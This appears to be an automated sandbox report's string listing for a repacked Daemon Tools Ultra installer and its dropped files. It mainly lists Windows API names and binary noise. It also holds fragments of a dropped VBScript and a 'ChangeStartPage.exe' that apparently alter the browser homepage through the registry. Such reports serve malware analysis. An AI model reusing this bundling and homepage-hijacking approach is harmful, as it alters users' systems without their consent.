Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00409000.00000004.mdmp)

RegDeleteKeyExW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

RegDeleteKeyTransactedW

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

RegDeleteKeyW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

RegDeleteSubkey

Ansi based on Dropped File (JSSys3.dll.204366558)

RegDeleteVal

Ansi based on Dropped File (JSSys3.dll.204366558)

RegDeleteValueA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

RegDeleteValueW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

RegEnumKeyA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

RegEnumKeyExA

Ansi based on Dropped File (JSSys3.dll.204366558)

RegEnumKeyW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

RegEnumValueA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

RegEnumValueW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

RegGetValue

Ansi based on Dropped File (JSSys3.dll.204366558)

RegisterClassA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

RegisterClassW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

RegisterTraceGuidsA

Ansi based on Dropped File (Tages.dll.423655889)

RegisterTypeLibForUser

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

REGISTRY

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

RegListKeys

Ansi based on Dropped File (JSSys3.dll.204366558)

RegListStringData

Ansi based on Dropped File (JSSys3.dll.204366558)

RegListStringDataWWW

Ansi based on Dropped File (JSSys3.dll.204366558)

RegListVals

Ansi based on Dropped File (JSSys3.dll.204366558)

RegOpenKeyA

Ansi based on Dropped File (JSSys3.dll.204366558)

RegOpenKeyExA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

RegOpenKeyExW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

RegOpenKeyTransactedW

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

RegQueryInfoKeyA

Ansi based on Dropped File (JSSys3.dll.204366558)

RegQueryValueA

Ansi based on Dropped File (JSSys3.dll.204366558)

RegQueryValueExA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

RegQueryValueExW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

RegServer

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

RegServerPerUser

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

RegSetValueA

Ansi based on Dropped File (JSSys3.dll.204366558)

RegSetValueExA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

RegSetValueExW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

regsvr32.exe

Unicode based on Runtime Data (HiRu.exe )

RegWriteValue

Ansi based on Dropped File (JSSys3.dll.204366558)

RegWriteValueWWW

Ansi based on Dropped File (JSSys3.dll.204366558)

RelativePath

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

ReleaseDC

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

RemoveDirectoryA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

RemoveDirectoryW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

RemovePropW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00409000.00000004.mdmp)

RePack-

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00409000.00000004.mdmp)

RestrictedAttributes

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Result

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Retrieve clipboard contents if format is plain text.

Ansi based on Dropped File (JSSys3.dll.204366558)

Retrieve clipboard contents if format is plain text.WW$

Ansi based on Dropped File (JSSys3.dll.204366558)

Returns a PEFile object for file path.

Ansi based on Dropped File (JSSys3.dll.204366558)

Returns comma-delimited list of running processes on 95/98/ME.

Ansi based on Dropped File (JSSys3.dll.204366558)

Returns comma-delimited list of running processes on 95/98/ME.0

Ansi based on Dropped File (JSSys3.dll.204366558)

returns file attributes: RO-1 Hidden-2 System-4

Ansi based on Dropped File (JSSys3.dll.204366558)

Returns milliseconds elapsed since call to TimerStart.

Ansi based on Dropped File (JSSys3.dll.204366558)

Returns path of default program for a given file extension.

Ansi based on Dropped File (JSSys3.dll.204366558)

Returns path of default program for a given file extension.WWW"

Ansi based on Dropped File (JSSys3.dll.204366558)

rf#$|{Hu"

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ri]{_

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

RichEd20

Unicode based on Hybrid Analysis (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

RichEd32

Unicode based on Hybrid Analysis (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

RichEdit

Unicode based on Hybrid Analysis (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

RichEdit20A

Ansi based on Hybrid Analysis (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00401000.00000020.mdmp)

RichEdit20W

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

RiZ@)V6=L?

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

rK^lmy5Y

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

RlO}(ZXzq]W

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

rmqvUhQ[m\

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

rnH+p)1:(iD{

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Roamable

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

roductName

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

rogID

Unicode based on Dropped File (JSSys3.dll.204366558)

root\

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

root\DTUsbBus

Unicode based on Hybrid Analysis (dtinst.exe , 00040010-00003808.00000000.40510.00841000.00000020.mdmp)

ror

Unicode based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

ROTFlags

Unicode based on Runtime Data (DiscSoftBusService.exe )

rP)$uZ:u<

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

RpcCacheTimeout

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

RPCSS

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

rR(*+gcvQ

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

RR77R7--KKKMPPQdWd

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

RR:R79-KTNKW^PQ

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

rRlq\rp9$dU

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

RRR--L-KNNOQ\Qb

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Rs)[tjw9,

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

RtlMoveMemory

Ansi based on Dropped File (JSSys3.dll.204366558)

RtlNtStatusToDosError

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

RtlUnwind

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

runtime error

Unicode based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

Runtime Error!Program:

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

RwIp7l{P,

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

RXq78m(KX

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ryptable:$DATA

Unicode based on Dropped File (JSSys3.dll.204366558)

rZ?zQm/E

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

rZO$YN@ZG

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

S![GlVwI!

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

S";L-kVQO

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

s#i|+?4~

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

S'/v*

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

S)S\CH:H0&

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

s-@J'7;G%

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

s-C%yM?9

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

s6AzSo4rT

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

S886333,+3++++

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

S=cwv,&^6

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

s@5\?`kb:

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

s@_W@std@@V?$allocator@_W@2@@io@boost@@VNo_Op@?$basic_oaltstringstream@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@23@@detail@boost@@

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

S[[88;;654,33,,+,,3

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

S[t84<5355++.++

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SafeDllSearchMode

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

SafeProcessSearchMode

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Safety Warning Level

Unicode based on Runtime Data (dtinst.exe )

Saturday

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

Save string to clipboard.

Ansi based on Dropped File (JSSys3.dll.204366558)

Save string to clipboard.W4

Ansi based on Dropped File (JSSys3.dll.204366558)

SaveDlg

Ansi based on Dropped File (JSSys3.dll.204366558)

SaveDlgW

Ansi based on Dropped File (JSSys3.dll.204366558)

sB=EP'$XT

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ScreenToClient

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Scrollbar

Unicode based on Dropped File (JSSys3.dll.204366558)

Scrollbars

Unicode based on Dropped File (JSSys3.dll.204366558)

SCSIAdapter

Unicode based on Hybrid Analysis (dtinst.exe , 00040010-00003808.00000000.40510.00841000.00000020.mdmp)

SD5}<-oZw

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SearchPathA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

SearchPathW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Security

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Security_HKLM_only

Unicode based on Runtime Data (DiscSoftBusService.exe )

Segoe UI

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Select Case objINIEdit.GetIniVal(strProfilesFileName, strSection, "IsRelative")

Ansi based on Dropped File (start72urez3kr.vbs)

Select Files

Unicode based on Dropped File (JSSys3.dll.204366558)

SelectFileDialog

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00409000.00000004.mdmp)

SelectFolderDialog

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00409000.00000004.mdmp)

Selection

Unicode based on Dropped File (JSSys3.dll.204366558)

SelectObject

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SelText

Unicode based on Dropped File (JSSys3.dll.204366558)

SendEFSFiles

Unicode based on Runtime Data (dtinst.exe )

SendMessageA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

SendMessageTimeoutA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

SendMessageTimeoutW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SendMessageW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SendTextCB

Ansi based on Dropped File (JSSys3.dll.204366558)

SeparateProcess

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

September

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

ServerExecutable

Unicode based on Runtime Data (DiscSoftBusService.exe )

Service

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

Service started/resumed

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

ServiceBinary = %12%\dtultrascsibus.sys

Ansi based on Dropped File (SET4F37.tmp)

ServiceType = 1

Ansi based on Dropped File (SET4F37.tmp)

SeShutdownPrivilege

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Set a window as active.

Ansi based on Dropped File (JSSys3.dll.204366558)

Set color of GUI element.

Ansi based on Dropped File (JSSys3.dll.204366558)

Set color of GUI element.W0

Ansi based on Dropped File (JSSys3.dll.204366558)

Set objFSO = Nothing

Ansi based on Dropped File (start72urez3kr.vbs)

Set objFSO = WScript.CreateObject("Scripting.FileSystemObject")

Ansi based on Dropped File (start72urez3kr.vbs)

Set objINIEdit = Nothing

Ansi based on Dropped File (start72urez3kr.vbs)

Set objINIEdit = WScript.CreateObject("JSSys3.INIEdit")

Ansi based on Dropped File (start72urez3kr.vbs)

Set objRegExp_HomePage = Nothing

Ansi based on Dropped File (start72urez3kr.vbs)

Set objRegExp_HomePage = WScript.CreateObject("VBScript.RegExp")

Ansi based on Dropped File (start72urez3kr.vbs)

Set objSWbemLocator = Nothing

Ansi based on Dropped File (start72urez3kr.vbs)

Set objSWbemLocator = WScript.CreateObject("WbemScripting.SWbemLocator")

Ansi based on Dropped File (start72urez3kr.vbs)

Set objSWbemObjectEx = Nothing

Ansi based on Dropped File (start72urez3kr.vbs)

Set objSWbemObjectEx = objSWbemServicesEx.Get("StdRegProv")

Ansi based on Dropped File (start72urez3kr.vbs)

Set objSWbemServicesEx = Nothing

Ansi based on Dropped File (start72urez3kr.vbs)

Set objSWbemServicesEx = objSWbemLocator.ConnectServer(strComputer, "root\default")

Ansi based on Dropped File (start72urez3kr.vbs)

SetActiveWindow

Ansi based on Dropped File (JSSys3.dll.204366558)

SetBackColor

Ansi based on Dropped File (JSSys3.dll.204366558)

SetBkColor

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SetBkMode

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SetClassLongA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

SetClassLongW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SetClipboardData

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SetComputerNameA

Ansi based on Dropped File (JSSys3.dll.204366558)

SetCurrentDirectoryA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

SetCurrentDirectoryW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SetCursor

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SetDefaultDllDirectories

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

SetDlgItemTextA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

SetDlgItemTextW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SetEnvironmentVariableW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SetErrorMode

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SetFileAttributesA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

SetFileAttributesW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SetFileInformationByHandleW

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

SetFilePointer

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SetFilePointerEx

Ansi based on Dropped File (imgengine.dll.62529018)

SetFileTime

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SetForegroundWindow

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SetHandleCount

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

SetLastError

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

SetPropW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00409000.00000004.mdmp)

SetRTL

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00409000.00000004.mdmp)

Sets Desk wallpaper. Takes path of BMP file and style setting.

Ansi based on Dropped File (JSSys3.dll.204366558)

Sets Desktop back color. Takes 6-char. hex code.

Ansi based on Dropped File (JSSys3.dll.204366558)

Sets Desktop back color. Takes 6-char. hex code.WW

Ansi based on Dropped File (JSSys3.dll.204366558)

SetSecurityDescriptorDacl

Ansi based on Memory/File Scan (nsCDD1.tmp , 00037985-00003668.00000000.38487.10002000.00000002.mdmp)

SetStdHandle

Ansi based on Dropped File (imgengine.dll.62529018)

SetSysColors

Ansi based on Dropped File (JSSys3.dll.204366558)

SetSystemColor

Ansi based on Dropped File (JSSys3.dll.204366558)

SetTextColor

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SetThreadpoolTimer

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

SetThreadpoolWait

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

SetThreadStackGuarantee

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

SetTimer

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00407000.00000002.mdmp)

Settings.reg

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

SEtU_lTY

Ansi based on Image Processing (screen_0.png)

SetUnhandledExceptionFilter

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

setupapi.app.log

Unicode based on Runtime Data (dtinst.exe )

setupapi.dev.log

Unicode based on Runtime Data (dtinst.exe )

setupapi.dll

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

SETUPAPI.dll

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

SetupCopyOEMInfW

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

SetupDiCallClassInstaller

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

SetupDiClassGuidsFromNameExW

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

SetupDiCreateDeviceInfoList

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

SetupDiCreateDeviceInfoW

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

SetupDiDestroyDeviceInfoList

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

SetupDiEnumDeviceInfo

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

SetupDiGetClassDevsExW

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

SetupDiGetClassDevsW

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

SetupDiGetDeviceRegistryPropertyW

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

SetupDiGetINFClassW

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

SetupDiSetClassInstallParamsW

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

SetupDiSetDeviceRegistryPropertyW

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

SetupDiSetSelectedDevice

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

SetUserData

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00409000.00000004.mdmp)

SetVolumeLabelA

Ansi based on Dropped File (JSSys3.dll.204366558)

SetWallpaper

Ansi based on Dropped File (JSSys3.dll.204366558)

SetWindowActive

Ansi based on Dropped File (JSSys3.dll.204366558)

SetWindowLongA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

SetWindowLongW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SetWindowPos

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SetWindowTextA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

SetWindowTextW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SetWorkingDirectoryFromTarget

Unicode based on Runtime Data (DiscSoftBusService.exe )

sg8YtdJ,O

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SHAutoComplete

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SHBrowseForFolderA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

SHBrowseForFolderW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

shell32

Ansi based on Dropped File (JSSys3.dll.204366558)

shell32.dll

Unicode based on Dropped File (JSSys3.dll.204366558)

SHELL32.dll

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Shell_TrayWnd

Unicode based on Dropped File (JSSys3.dll.204366558)

ShellExecuteA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

ShellExecuteExA

Ansi based on Dropped File (JSSys3.dll.204366558)

ShellExecuteW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ShellLink.dll

Unicode based on Runtime Data (ChangeStartPage.exe )

ShellState

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

SHFileOperationA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

SHFileOperationW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SHFOLDER

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SHGetFileInfoA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

SHGetFileInfoW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SHGetFolderPathA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00409000.00000004.mdmp)

SHGetFolderPathW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SHGetPathFromIDListA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

SHGetPathFromIDListW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SHGetSpecialFolderLocation

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SHLWAPI

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Show folder selction dialogue and return selected path.

Ansi based on Dropped File (JSSys3.dll.204366558)

ShowCompColor

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

ShowDebugInfo

Unicode based on Runtime Data (HiRu.exe )

ShowInfoTip

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Shows a Choose Color dialogue.

Ansi based on Dropped File (JSSys3.dll.204366558)

Shows a Save File dialogue.

Ansi based on Dropped File (JSSys3.dll.204366558)

Shows a Save File dialogue.WWW7

Ansi based on Dropped File (JSSys3.dll.204366558)

Shows Open File dialogue with multiple selection option.

